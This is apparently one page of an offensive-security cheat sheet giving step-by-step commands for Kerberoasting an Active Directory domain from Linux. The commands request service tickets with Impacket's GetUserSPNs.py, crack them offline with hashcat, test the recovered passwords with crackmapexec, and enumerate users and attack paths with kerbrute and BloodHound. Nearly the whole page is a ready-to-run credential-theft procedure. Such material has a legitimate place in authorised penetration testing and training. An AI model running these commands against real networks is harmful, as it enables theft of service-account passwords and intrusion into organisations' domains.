14.Kerberoasting - from Linux

Installation (if needed):

sudo python3 -m pip install .  # Installs Impacket from the current directory
sudo pip3 install impacket    # Alternative, if available from pip repositories

Help:

GetUserSPNs.py -h  # Displays help options

List SPNs (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>  # Replace <DC_IP>, <DOMAIN>, and <USER> with actual values. Prompts for password.

Request TGS Tickets (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request

Request TGS Ticket (specific user):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER>

Request and Save TGS Ticket:

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER> -outputfile <OUTPUT_FILE>  # Replace <OUTPUT_FILE> with the desired filename.

Hashcat (Linux):

Crack TGS Ticket:

hashcat -m 13100 <TGS_FILE> <WORDLIST>  # Replace <TGS_FILE> with the ticket file and <WORDLIST> with the wordlist path.
hashcat -m 13100 <TGS_FILE> <WORDLIST> --force  # Adds the --force option, useful when hashcat detects potential errors with the hash.
hashcat -m 13100 <TGS_FILE> <WORDLIST> -o <CRACKED_FILE>  # Adds the -o option to output the cracked password to a file.

CrackMapExec (Linux):

Test Authentication:

sudo crackmapexec smb <DC_IP> -u <USER> -p <PASSWORD>

Verification of Extracted Hashes:

Before cracking, verify the extracted TGS hashes:

strings <TGS_FILE> | head
hexdump -C <TGS_FILE> | less

This helps confirm that the ticket is properly extracted.

Interactive Shell Variants:

If running GetUserSPNs.py over SSH or in a restricted shell, use:

python3 -c "import os; os.system('GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>')"

Or execute the script in a non-interactive mode:

nohup python3 GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request &

This ensures the process runs even after logging out.

Alternative Tools for SPN Enumeration:

  1. kerbrute - Fast SPN brute-forcing and enumeration.

    ./kerbrute userenum -d <DOMAIN> --dc <DC_IP> userlist.txt

  2. BloodHound - Visualizing AD attack paths.

    neo4j console &
bloodhound-python -u <USER> -p <PASSWORD> -d <DOMAIN> -c All
Previous6.Cooking with FireNext15. Kerberoasting - from Windows

Last updated